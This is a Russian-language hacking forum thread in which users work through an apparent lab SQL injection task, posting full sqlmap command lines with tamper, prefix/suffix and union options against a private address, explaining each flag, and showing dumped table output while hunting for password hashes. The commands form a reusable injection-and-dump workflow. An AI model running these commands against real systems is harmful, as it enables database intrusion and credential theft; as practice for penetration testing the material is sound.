HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.12.2016, 14:48
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.

sqlmap--flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix="-- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --techniqueU -D site --threads 10 --tables --common-tables

--tamper randomcase
-- использовать фильтр скульмапа для генерации пейлоада в различном регистре
--random-agent-- использовать случайный UserAgent
--code=200-- использовать в качестве валидных ответов заголовок ответа 200 ок, 301(редирект) будет распознан как невалидный запрос
--level 5--использовать маскимальный уровень поиска векторов
--risk3 почти тоже самое что и --level
--technique U--пытаться использовать только векторы UnionBased SQL injection
--url "http://someurl.php?id=*"-- астериксом(*) мы указываем место для инжекта
--prefix-- то что использовать в начале запроса
--suffix-- то что использовать в конце запроса
--threads 10- к-тво потоков

Цитата:

Ошибка [ERROR] unable to retrieve the number of databases.

--flush-session -очистить сессию скульмапа

 
Ответить с цитированием

  #12  
Старый 17.12.2016, 19:34
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

~~DarkNode~~ сказал(а):

sqlmap--flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix="-- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --techniqueU -D site --threads 10 --tables --common-tables

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes

Database: site

Table: users

[1 entry]

+----+-----------+

| id | username |

+----+-----------+

| 1 | e.lindsey |

+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?
 
Ответить с цитированием

  #13  
Старый 17.12.2016, 19:53
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

ghostphisher сказал(а):

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

Только в 2 раза меньше таблиц=)
Нашел бы,просто так быстрее, --code=200 тут нужно потому что тут не стандартное поведение контента,тут нету ошибки на вывод,тут есть редирект вместо ошибки. По идеи и без этого параметра должно отработать,но sqlmap - это программа,не стоит забывать,она может не коректно понимать логику поведения страницы,и именно в таких ситуациях лучше использовать такой параметр)
 
Ответить с цитированием

  #14  
Старый 17.12.2016, 20:07
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

ghostphisher сказал(а):

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?
Попробуй сперва найти столбец password в таблице users. Я не помню просто есть ли точно он в common-columns,но должен быть.
Попробуй сначала так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --common-columns
А потом
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --dump
Или же просто так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users -С username,password --dump
 
Ответить с цитированием

  #15  
Старый 17.12.2016, 20:18
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))
Вот пару старых моих видео про работу руками если кому интересно:
[hide=12]
 
Ответить с цитированием

  #16  
Старый 17.12.2016, 21:28
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Цитата:

~~DarkNode~~ сказал(а):

Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))

итог тот же
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

что ж, это еще раз доказала про руки и мозг Спасибо за подробные ответы - информация очень полезная.
 
Ответить с цитированием

  #17  
Старый 20.12.2016, 21:42
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

sergeyxz сказал(а):

будет время напиши статью про BurpSuite...

Боюсь в одну статью это может не вместится)
 
Ответить с цитированием

  #18  
Старый 24.12.2016, 09:58
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

HackBar модифицированный
Цитата:

mafiasepa сказал(а):

А что за расширение для инъекции на фоксе?

 
Ответить с цитированием

  #19  
Старый 24.12.2016, 12:08
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

mafiasepa сказал(а):

Спасибо. Очень интересные статьи и довольно подробно описаны.
Я извиняюсь это не твой канал на тубу https://www.youtube.com/channel/UCD-dZRqYVkMEJ0_NVp0frWw
мой
 
Ответить с цитированием

  #20  
Старый 28.12.2016, 11:56
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

KIra сказал(а):

DarkNode, а где можно узнать побольше о запросах ?

О каких именно ?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.